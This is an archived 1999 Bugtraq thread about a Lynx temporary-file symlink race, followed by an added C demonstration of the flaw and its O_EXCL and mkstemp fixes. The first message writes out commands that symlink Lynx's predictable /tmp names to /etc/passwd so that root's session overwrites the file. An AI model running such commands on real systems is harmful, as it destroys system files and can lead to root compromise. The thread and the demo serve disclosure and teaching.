
lynxtmp.txt

Posted Aug 17, 1999

Lynx /tmp bug involving symlinks can lead to local root compromise.

tags | exploit, local, root
SHA-256 | a6b28927f7725cb5e7841faa2bb5111e32452c91664008bad5d0baa2ce7ea8df

Date: Tue, 9 Feb 1999 20:57:30 -0500
From: Juan Diego Bolanos <diego@HERCULES.UNIVALLE.EDU.CO>
To: BUGTRAQ@netspace.org
Subject: Lynx /tmp problem

Hi Aleph,
please filter this if already posted....
------

Hello....

I have found a bug in all versions of Lynx, except the latest stable
release...

lynx creates temporary files in /tmp in this way....


L[num proc]-xTMP.html

where

[num proc] is the proc number in the machine
x is a number from 0 to 9

if i run lynx as any user, for example root, we see this

earthworm:~$ ps
PID TTY STAT TIME COMMAND
91 1 SW 0:06 (bash)
94 4 S 0:05 -bash
95 5 SW 0:06 (bash)
3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
3870 3 SW 0:02 (ssh)
3894 4 T 0:00 lynx
3898 4 R 0:00 ps

then the files in /tmp created by lynx will be..

L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html

if i make a symlink
from all of these files to any file in the system, for example....


earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html

and now root (in this example) tries to download a file, or presses the
backspace key to reach the history list, the file i have linked (in this
case /etc/passwd) will be replaced with it... and now is owned by root...

for example i got this in my system...

earthworm:/tmp$ cat /etc/passwd

<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
<em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>


like you see, the file is lost now...

this bug is lynx specific, so all OS are vulnerable..

Fix, upgrade to the latest lynx version, i have checked it, and it appears
to use a L[proc num]-xTMP.html where x is from 0 to ???...

i hope it is already fixed, creating 100 symlinks is not too hard :)

the lynx team knows this already.

by...


Juan Diego

---------------------------------------------------------------------------

Date: Thu, 11 Feb 1999 12:55:41 -0700
From: Theo de Raadt <deraadt@CVS.OPENBSD.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Lynx /tmp problem

> this bug is lynx specific, so all OS are vulnerable..

OpenBSD ships with an integrated version of lynx. Our version has
tweaks to avoid this issue.

We've brought this issue up with the lynx people before. They do not
appear to give a damn.

That said, from reading the code I can see why they might not care --
this problem is going to be a complete nightmare to fix. Lynx's
handling of /tmp is wrought with many races, and the code is pasta.

---------------------------------------------------------------------------

Date: Fri, 12 Feb 1999 08:47:00 +0000
From: Glynn Clements <glynn@SENSEI.CO.UK>
To: BUGTRAQ@netspace.org
Subject: Re: Lynx /tmp problem

Juan Diego Bolanos wrote:

> Hi Aleph,
> please filter this if already posted....

The fact that lynx has potential /tmp problems was discussed last
March:

From: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
Subject: Another day, another race - lynx 2.7.1
Date: Tue, 17 Mar 1998 15:39:58 +0100
Message-ID: <Pine.LNX.3.96.980317152338.14878A-100000@genome>

> I have found a bug in all versions of Lynx, except the latest stable
> release...
>
> lynx creates temporary files in /tmp in this way....

[details of your average /tmp problem snipped].

From the INSTALLATION file:

The environment variable "LYNX_TEMP_SPACE", if set, will override the
default path prefix for temporary files that was defined via the constant
"TEMP_SPACE" in userdefs.h. See userdefs.h for more information.

--
Glynn Clements <glynn@sensei.co.uk>
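
Added example, not part of the original thread and not lynx source: the symlink clobber described in the first message, reproduced inside a private mkdtemp() sandbox, next to the two standard fixes for it, O_CREAT|O_EXCL on the fixed name and mkstemp(). The run_case helper, the lynxdemo directory name and the sample file contents are constructed for illustration.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed sample data; the victim file stands in for /etc/passwd. */
#define VICTIM_DATA "root:x:0:0:constructed sample\n"
#define PAGE_DATA   "<title>Lynx History Page</title>\n"
enum mode { PREDICTABLE, EXCLUSIVE, MKSTEMP };

/* Plants a symlink at the guessable name, performs one temp-file write in the
 * chosen mode, and returns the victim's size afterwards (-1 if setup failed).
 * *err receives errno from the open step, 0 on success. */
long run_case(enum mode m, int *err) {
    char dir[] = "/tmp/lynxdemo.XXXXXX", victim[64], name[64], tmpl[64];
    struct stat st; int fd;
    if (!mkdtemp(dir)) return -1;               /* private 0700 sandbox */
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(name, sizeof name, "%s/L%ld-0TMP.html", dir, (long)getpid());
    snprintf(tmpl, sizeof tmpl, "%s/LXXXXXX", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs(VICTIM_DATA, f); fclose(f);
    if (symlink(victim, name) != 0) return -1;  /* link exists before the open */
    if (m == PREDICTABLE)     /* follows the link and truncates its target */
        fd = open(name, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    else if (m == EXCLUSIVE)  /* EEXIST if the name exists, even as a symlink */
        fd = open(name, O_WRONLY | O_CREAT | O_EXCL, 0600);
    else                      /* random name, created exclusively, mode 0600 */
        fd = mkstemp(tmpl);
    *err = fd < 0 ? errno : 0;
    if (fd >= 0 && write(fd, PAGE_DATA, strlen(PAGE_DATA)) < 0) *err = errno;
    if (fd >= 0) close(fd);
    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(name); unlink(tmpl); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    for (int m = PREDICTABLE; m <= MKSTEMP; m++) {
        int e = 0;
        long size = run_case((enum mode)m, &e);
        printf("mode %d: victim is %ld bytes, open errno %d\n", m, size, e);
    }
    return 0;
}
```

The sandbox directory is not a sticky world-writable directory, so the Linux fs.protected_symlinks restriction does not mask the first case; on a real /tmp that sysctl is a further layer of defence, not a substitute for exclusive creation.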
